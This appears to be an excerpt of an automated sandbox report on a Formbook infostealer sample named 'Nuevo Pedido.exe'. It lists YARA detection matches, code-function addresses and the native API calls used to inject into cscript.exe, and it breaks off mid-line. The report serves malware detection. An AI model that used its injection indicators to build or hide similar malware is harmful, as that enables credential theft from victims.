            Source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: Nuevo Pedido.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 0_2_00A85C240_2_00A85C24
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 0_2_02BC82500_2_02BC8250
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 0_2_02BCD2F80_2_02BCD2F8
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 0_2_05635AA00_2_05635AA0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 0_2_05635AB00_2_05635AB0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_004010303_2_00401030
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_0041BC783_2_0041BC78
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_00408C7B3_2_00408C7B
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_00408C803_2_00408C80
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_0041BD013_2_0041BD01
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_00402D903_2_00402D90
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_0041BEE03_2_0041BEE0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_00402FB03_2_00402FB0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_0041CFB63_2_0041CFB6
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_00DE5C243_2_00DE5C24
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019BF9003_2_019BF900
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019D41203_2_019D4120
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A820A83_2_01A820A8
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019CB0903_2_019CB090
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E20A03_2_019E20A0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A828EC3_2_01A828EC
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A710023_2_01A71002
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019EEBB03_2_019EEBB0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A7DBD23_2_01A7DBD2
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A82B283_2_01A82B28
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A822AE3_2_01A822AE
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019E25813_2_019E2581
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A825DD3_2_01A825DD
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019CD5E03_2_019CD5E0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A82D073_2_01A82D07
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019B0D203_2_019B0D20
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A81D553_2_01A81D55
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019C841F3_2_019C841F
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A7D4663_2_01A7D466
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A81FF13_2_01A81FF1
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A82EF73_2_01A82EF7
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019D6E303_2_019D6E30
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A7D6163_2_01A7D616
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478841F16_2_0478841F
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0483D46616_2_0483D466
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04770D2016_2_04770D20
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_048425DD16_2_048425DD
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04842D0716_2_04842D07
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478D5E016_2_0478D5E0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04841D5516_2_04841D55
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A258116_2_047A2581
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04796E3016_2_04796E30
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04842EF716_2_04842EF7
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0483D61616_2_0483D616
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04841FF116_2_04841FF1
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_048420A816_2_048420A8
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_048428EC16_2_048428EC
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0483100216_2_04831002
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A20A016_2_047A20A0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478B09016_2_0478B090
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0479412016_2_04794120
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477F90016_2_0477F900
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_048422AE16_2_048422AE
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0483DBD216_2_0483DBD2
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04842B2816_2_04842B28
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AEBB016_2_047AEBB0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0061BC7816_2_0061BC78
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00608C7B16_2_00608C7B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00608C8016_2_00608C80
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0061BD0116_2_0061BD01
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00602D9016_2_00602D90
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0061BEE016_2_0061BEE0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00602FB016_2_00602FB0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0061CFB616_2_0061CFB6
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: String function: 019BB150 appears 35 times
            Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0477B150 appears 35 times
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_004185E0 NtCreateFile,3_2_004185E0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_00418690 NtReadFile,3_2_00418690
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_00418710 NtClose,3_2_00418710
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_004187C0 NtAllocateVirtualMemory,3_2_004187C0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_004185DA NtCreateFile,3_2_004185DA
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_0041870C NtReadFile,NtClose,3_2_0041870C
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_004187BA NtAllocateVirtualMemory,3_2_004187BA
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F99A0 NtCreateSection,LdrInitializeThunk,3_2_019F99A0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_019F9910
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F98F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_019F98F0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9840 NtDelayExecution,LdrInitializeThunk,3_2_019F9840
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9860 NtQuerySystemInformation,LdrInitializeThunk,3_2_019F9860
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9A00 NtProtectVirtualMemory,LdrInitializeThunk,3_2_019F9A00
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9A20 NtResumeThread,LdrInitializeThunk,3_2_019F9A20
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9A50 NtCreateFile,LdrInitializeThunk,3_2_019F9A50
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F95D0 NtClose,LdrInitializeThunk,3_2_019F95D0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9540 NtReadFile,LdrInitializeThunk,3_2_019F9540
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9780 NtMapViewOfSection,LdrInitializeThunk,3_2_019F9780
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F97A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_019F97A0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9FE0 NtCreateMutant,LdrInitializeThunk,3_2_019F9FE0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9710 NtQueryInformationToken,LdrInitializeThunk,3_2_019F9710
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F96E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_019F96E0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_019F9660
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F99D0 NtCreateProcessEx,3_2_019F99D0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_019F9950 NtQueueApcThread,3_2_019F9950
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode func